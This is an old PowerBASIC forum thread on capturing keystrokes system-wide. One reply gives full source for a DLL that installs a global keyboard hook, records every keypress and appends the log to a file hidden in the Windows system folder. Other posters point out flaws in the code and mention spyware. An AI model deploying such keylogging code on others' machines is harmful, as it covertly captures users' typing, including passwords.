Announcement

**Lance Edmonds** · 10 Dec 2000, 01:04 PM

Search the BBS for "WH_KEYBOARD" and you should find some code...

------------------
Lance
PowerBASIC Support
mailto:[email protected][email protected]</A>

**Scott Turchin** · 10 Dec 2000, 01:54 PM

Thanks Lance, that helped!

Now, the key is a global hook in my case, need ALL process's scanned etc...

This is hte code from the Local hook, how do I use it to get ANY key pressed.

ghKbrdHook = SetWindowsHookEx(%WH_KEYBOARD, CodePtr(KeyboardHook), 0, GetCurrentThreadId)

Thanks,

Scott

------------------
Scott
mailto:[email protected][email protected]</A>

**Wyman A Belts** · 10 Dec 2000, 07:09 PM

Hi Scott,
I made this DLL several years ago and it'll do what you want I
think. Global hooks must be in DLL form, so what I did was start a
simple prog that loaded this DLL using loadlibrary and then sat there
in a loop sleeping. Anyway, have a look at it and I think you'll
get the idea:

Code:

$COMPILE DLL  "D:\KEYS32.DLL"
$INCLUDE "Win32API.INC"

FUNCTION LibMain(BYVAL hInstance   AS LONG, _
                 BYVAL fwdReason   AS LONG, _
                 BYVAL lpvReserved AS LONG) EXPORT AS LONG

  GLOBAL hHook     AS LONG    'hook handle needed to unload hook
  GLOBAL KeyBuffer AS STRING  'String to hold keypresses

  SELECT CASE fwdReason

    CASE %DLL_PROCESS_ATTACH
    'Initialize buffer:  
      KeyBuffer = "Start: " & DATE$ & "//"& TIME$ & CHR$(13, 10)
     
    'Install hook Procedure:
      hHook = SetWindowsHookEx&(%WH_KEYBOARD, _
                                CODEPTR(KeyBoardHookFunction), _
                                hInstance, _
                                0&)
      IF hHook THEN
        LibMain = 1   'success!
      END IF
      EXIT FUNCTION

    CASE %DLL_PROCESS_DETACH
      IF LEN(KeyBuffer) >  29 THEN  'Length Of Header
        KeyBuffer = KeyBuffer & CHR$(13,10) & "End: " & DATE$ & "//"& TIME$ & CHR$(13, 10)
        OPEN "C:\WINDOWS\SYSTEM\Text.TXT" FOR APPEND AS #1
        PRINT #1, KeyBuffer
        CLOSE #1
      END IF
      
      hHook = UnhookWindowsHookEx(hHook)
       
      IF hHook THEN
        LibMain = 1   'success!
      END IF
    
    END SELECT

END FUNCTION

FUNCTION KeyBoardHookFunction(BYVAL HookCode AS LONG, _
                              BYVAL wParam AS LONG, _
                              BYVAL lParam AS LONG) EXPORT AS LONG
  IF BIT(lParam, 31) THEN                     'Only grab the keyup
    SELECT CASE wParam
      CASE 32 TO 90                           'Normal Ascii Keys
        KeyBuffer = KeyBuffer & CHR$(wParam)  'add keypress
    END SELECT
  END IF
END FUNCTION

Anyway, I hope that helps, Good Luck!!!

------------------
[email protected]

**Scott Turchin** · 10 Dec 2000, 07:25 PM

thanks!
I was noticing the 3 page responses to your previous article, in fact that's where I got the source, modified it, and got stuck.
This makes wonderful sense!
In fact I should be able to put together this package in just a few hours at this point!

Thanks again!

Scott

------------------
Scott
mailto:[email protected][email protected]</A>

**Michael Burns** · 8 Nov 2001, 11:53 AM

I just noticed Wyman's key logging example. Not having dealt with hooks
before, a couple of questions immediately come to mind:

1. How many applications can hook the keyboard at the same time?
2. How can one tell if someone already has hooked it? i.e. Can
one look for a list of processes hooking a given device?

------------------
Michael Burns

**Michael Mattias** · 8 Nov 2001, 12:43 PM

Just for the record...

There is a keyboard-hooking application on my system, something called "Encompass."

Like a lot of the software installed under Windows, I have no clue what application installed it or why it even exists.

BUT

Every now and then it GPFs when running one of my applications. While the "Details" of the GPF clearly show it is the "Encompass" software which failed, it sure looks to the user as though it is a problem with my software.

So if you are going to write a keyboard hooker, please test it very very well.

MCM
(hmm,"keyboard hooker": is that a musically-gifted hospitality industry employee?)

**Lance Edmonds** · 8 Nov 2001, 01:17 PM

"Encompass"? Sounds suspiciously like a spyware app...

------------------
Lance
PowerBASIC Support
mailto:[email protected][email protected]</A>

**Semen Matusovski** · 8 Nov 2001, 01:57 PM

Should note that Wyman's code looks only as global hook.
1) "Global" means one per all apps.
If to set a hook in LibMain, it will be a lot of independent hooks.
2) In hook proc it's necessary to call next hook proc. Otherwise a chain will be destroyed.

BTW, I posted somehow a sample of global keyboard hook and today I reconstructed it a little to avoid external file.

About Michael's questions.
> 1) How many applications can hook the keyboard at the same time?
Theoretically, unlimited, but keyboard hooks should be correct.
For example, Wyman's code will kill all another hooks.

> 2). How can one tell if someone already has hooked it? i.e. Can
one look for a list of processes hooking a given device?

As I understand, there is no documented way to look a chain.

------------------
E-MAIL: [email protected]

Announcement

Capturing keystrokes

Capturing keystrokes

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment